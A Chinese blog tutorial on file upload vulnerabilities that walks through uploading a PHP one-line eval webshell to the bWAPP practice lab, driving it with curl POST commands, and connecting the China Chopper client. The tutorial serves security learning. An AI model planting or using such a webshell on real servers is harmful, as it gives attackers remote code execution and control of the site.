Web安全(一)文件上传漏洞[一]

最新推荐文章于 2023-03-21 17:25:01 发布
最新推荐文章于 2023-03-21 17:25:01 发布
阅读量647 收藏 1
点赞数
分类专栏: Web安全 文章标签: shell php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43681532/article/details/114781319
版权

个人博客:https://hackbg.gitee.io/

文章目录

文件上传漏洞概述

文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、改头像、分享图片等。

文件上传漏洞是在开发者没有做充足验证(包括前端,后端)情况下,允许用户上传恶意文件,这里上传的文件可以是木马、病毒、恶意脚本或者Webshell等。

二、编辑木马文件并上传

1.eval函数

eval( string $code)

把字符串 code 作为PHP代码执行。函数eval()语言结构允许执行任意 PHP 代码。code为 需要被执行的字符串 。

代码执行的作用域是调用 eval() 处的作用域。因此,eval() 里任何的变量定义、修改,都会在函数结束后被保留。

2.PHP一句话木马

<?php @eval($_POST['hacker']); ?>

新建文本文件写入PHP一句话木马,并将txt后缀改为php.

在这里插入图片描述

上传PHP文件

登录bwapp靶场后选择Unrestricted File Upload,文件上传漏洞上传文件,上传后可以看到路径为 靶场路径+/images/shell.php

在这里插入图片描述
在这里插入图片描述

webshell执行命令

在cmd执行

curl -d "hacker=echo get_current_user();" 靶场路径/images/shell.php
curl -d "hacker=echo getcwd();" 靶场路径/images/shell.php

get_current_user — 获取当前 PHP 脚本所有者名称

getcwd — 取得当前工作目录。
在这里插入图片描述

使用中国菜刀连接

下载链接:https://github.com/raddyfiy/caidao-official-version

打开软件后,右键添加SHELL连接即可。

在这里插入图片描述

在这里插入图片描述

不同语言一句话木马

在这里插入图片描述

肥胖喵
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bwapp漏洞平台部署
afei001
05-09 259
目录 1.bwAPP漏洞平台介绍 2.Phpstudy部署Bwapp环境 2.1 Phpstudy创建bwapp网站 2.2 配置数据库文件 2.3 安装bwAPP 3.VMware镜像部署bWAPP 1.bwAPP漏洞平台介绍 bwAPP是一个漏洞平台,包含了近100个Web漏洞,几乎涵盖了所有的漏洞类型,可以帮助安全人员更好地学习了解WEB漏洞原理、漏洞利用和漏洞修复方式。 2.Phpstudy部署Bwapp环境 使用Phpstudy本地搭建b...
web-渗透-文件上传漏洞专题靶场.rar
03-14
本靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境,解压,运行exe既可以完成所有需要的环境部署,省去大量繁琐的操作。
文件上传漏洞
qq_63179750的博客
10-21 1498
文件上传漏洞
文件上传漏洞 (Part1)
Che_ng的博客
10-19 1365
文件上传漏洞、后缀名绕过原理
上传漏洞总结
qq_41453632的博客
01-09 229
web网站文件上传漏洞和攻击-运维安全详细笔记
最新发布
06-30
Web 网站文件上传漏洞和攻击 - 运维安全详细笔记 文件上传漏洞Web 应用程序中的一种常见漏洞,攻击者可以通过上传恶意文件来获取服务器的控制权。本文将详细介绍文件上传漏洞的原理、实验步骤和防御方法。 一、...
web安全技术-实验六、文件上传漏洞.doc
08-20
文件上传漏洞】是Web应用安全领域中的一个重要概念,它主要出现在允许用户上传文件到服务器的应用程序中。当系统没有正确地验证或过滤上传的文件类型时,攻击者可以利用这个漏洞上传恶意代码,例如病毒、木马或者...
Web应用安全:文件包含漏洞简介.pptx
06-18
文件包含漏洞Web应用安全领域中的一个重要话题,它主要源于开发者在编程时为了代码复用而采用的文件包含机制。这种机制允许程序动态地加载和执行存储在不同文件中的代码,但同时也为攻击者提供了可乘之机。下面将...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
在实验中,我们使用了 DVWA 安全测试平台,搭建了一个有文件上传漏洞的网站,使用中国菜刀工具获取了网站的 webshell,进而获取了网站和所在服务器的相关数据。 在防御文件包含漏洞时,务必要禁用文件包含功能,...
计算机网络安全文件上传漏洞及防御措施.pdf
09-19
计算机网络安全文件上传漏洞是一种常见的Web安全漏洞,攻击者可以通过上传恶意代码的文件来获取服务器的控制权。为了防御这种攻击,需要对文件上传进行严格的校验检测,限制上传文件的大小,检测文件名、后缀名和...
BWapp_Solutions:它将帮助解决BWapp应用程序中可用的漏洞挑战
02-20
BWapp_Solutions 它将帮助解决BWapp应用程序中可用的漏洞/挑战
任意上传漏洞演示
03-07
讲述了任意上传漏洞以及一句话木马:
tfCheckmarxUpload:将 Checkmarx 静态分析结果 (xml) 文件上传到 ThreadFix 的程序。 TFCheckmarxUpload 用于自动提交 Checkmarx 结果到 ThreadfFix
06-09
tfCheckmarx-uploader 可用于自动将 XML 格式的 Checkmarx 扫描结果文件上传到 ThreadFix 服务器。 它旨在作为计划的作业/任务运行或称为临时。 它仅在遇到导致以 1 aka 错误退出的严重错误时才产生控制台输出。 tfCheckmarx-uploader 期望文件命名为: {ThreadFix AppID}_[App Name].后面的东西 因此,将您的文件命名为:12_[My App]-6.4.2015-17.3.46.xml。 更多文件名示例在下面的日志示例中。 它不是在控制台上冗长,而是在特定目录中创建一个日志文件。 运行 tfCheckmarx-uploader 的一个例子是: INFO: 2015/04/28 18:11:47 Starting up checkmarx-uploader version 1.3 INFO:
简学-文件上传漏洞
码农米格的博客
03-22 232
文件上传漏洞0x00 文件上传漏洞的相关概念0x01 一句话木马的原理及利用0x02 中国菜刀的使用0x03 文件上传的绕过姿势JavaScript校验MIME类型校验:拓展名校验:解析漏洞文件头检测绕过0x04 文件上传漏洞的防御手段 针对文件上传漏洞的学习。 实验平台采用的是 bWAPP 0x00 文件上传漏洞的相关概念 文件上传功能:是大部分 WEB 应用必被的功能,网站允许用户自行上传头像、一些社交类网站允许用户上传照片、一些服务类网站需要用户上传证明材料的电子档、电商类网站允许用户上传图
bwapp漏洞环境搭建及漏洞复现
weixin_67813445的博客
03-21 251
bWAPP 是一款非常好的漏洞演示平台,其包含有100多个漏洞
Web安全(一)文件上传漏洞[二]
qq_43681532的博客
03-15 584
文章目录后缀名绕过 后缀名绕过 1.(bwapp靶场)同样选择文件上传漏洞漏洞难度选择medium中等难度。 尝试上传上篇(Web安全(一)文件上传漏洞[一])的的一句话木马文件,可以看到上传失败。 3.将一句话木马的文件后缀名从.php改为.php3,再次上传一句话木马,这时已经成功上传,这就是对文件后缀名的绕过。尝试执行webshell,也是可以成功执行。 curl -d "hacker=echo get_current_user();" http://127.0.0.1:8080/imag
XVWA Unrestricted File Upload
baynk的博客
04-04 992
0x01 Unrestricted File Upload 上传界面,直接看源码。 <?php error_reporting(E_ALL); $itemcode = "XVWA".rand(1000,9999); $itemname = isset($_POST['item']) ? $_POST['item'] : ''; $itemdesc = isset($_POST['desc...
《学习笔记114》—— # 文件上传漏洞 # 基于OWASP的文件上传漏洞
weixin_53801131的博客
08-16 636
文件上传漏洞介绍: 正常的文件上传一般指图片、视频、文档等,web应用收集之后放入后台或者数据库存储,需要的时候再调用返回。 如果存在文件上传漏洞,黑客可以将恶意文件,比如php、jsp、asp等脚本文件上传到服务器,绕过web应用程序执行,效果相当于黑客直接拿到服务器的webshell,一旦黑客拿到webshell,则可以获取web应用的数据,删除web文件,甚至可以通过提权,进一步拿下整个服务器,还可以进行内网渗透。 文件上传漏洞和SQL注入漏洞攻击对象的区别: SQL注入漏洞攻击对象是数据库;
合法练习黑客技术?这15个网站也许可以帮到你
m0_61869253的博客
03-12 849
这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。iOS 7及其以上版本都可以安装并使用这款包含大量安全漏洞的app,这个平台对于移动app开发人员是非常有帮助的,因为网上虽然有很多可以练习黑客技术的网站,但是可以用来练习的移动端app则少之又少。提供了超过五十种难度级别,而且还有一个活跃的在线交流社区,所以HackThis!游戏的目的是为了测试你的应用程序安全技能,游戏中的每个问题都会给你提供一串代码,而你需要在有限的时间内找出这些代码中存在的安全漏洞
Web安全基础:文件上传漏洞解析与防范
Web安全中的文件处理漏洞主要包括任意文件上传和任意文件下载两大类,这些漏洞常常由于开发者对文件操作的安全性不够重视而导致。任意文件上传漏洞允许攻击者上传恶意脚本到Web服务器,从而可能对服务器造成严重威胁...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值